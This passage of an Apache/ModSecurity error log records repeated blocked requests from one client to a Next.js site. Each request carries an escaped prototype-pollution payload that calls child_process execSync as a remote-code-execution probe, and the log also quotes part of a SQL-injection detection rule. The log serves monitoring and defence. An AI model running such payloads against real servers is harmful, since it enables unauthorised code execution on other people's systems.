{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "adJm15c83uMXRUE9zvQTvAAAAdA"] [Sun Apr 05 15:42:47.655820 2026] [:error] [pid 23077:tid 23083] [client 172.94.9.253:38634] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm15c83uMXRUE9zvQTuwAAAcA"] [Sun Apr 05 15:42:47.657956 2026] [:error] [pid 1503:tid 1534] [client 172.94.9.253:38612] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm10I7AjfUQYCN-J7EBQAAANY"] [Sun Apr 05 15:42:47.697210 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:38648] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm17xQSOrq_iRTM7drCQAAAQ4"] [Sun Apr 05 15:42:47.712544 2026] [:error] [pid 1308:tid 1368] [client 172.94.9.253:38602] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJm1yj-HYEhJWFlG6EriwAAAFQ"] [Sun Apr 05 15:42:47.727617 2026] [:error] [pid 13019:tid 13243] [client 172.94.9.253:38564] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm17xQSOrq_iRTM7drCAAAAQM"] [Sun Apr 05 15:42:47.745246 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:38662] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/contact"] [unique_id "adJm15c83uMXRUE9zvQTvgAAAcU"] [Sun Apr 05 15:42:47.771718 2026] [:error] [pid 1503:tid 1528] [client 172.94.9.253:38664] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm10I7AjfUQYCN-J7ECAAAANM"] [Sun Apr 05 15:42:47.851273 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:38678] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJm17xQSOrq_iRTM7drDQAAAQk"] [Mon Apr 06 10:49:16.913779 2026] [:error] [pid 19593:tid 19954] [client 4.223.104.110:63705] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php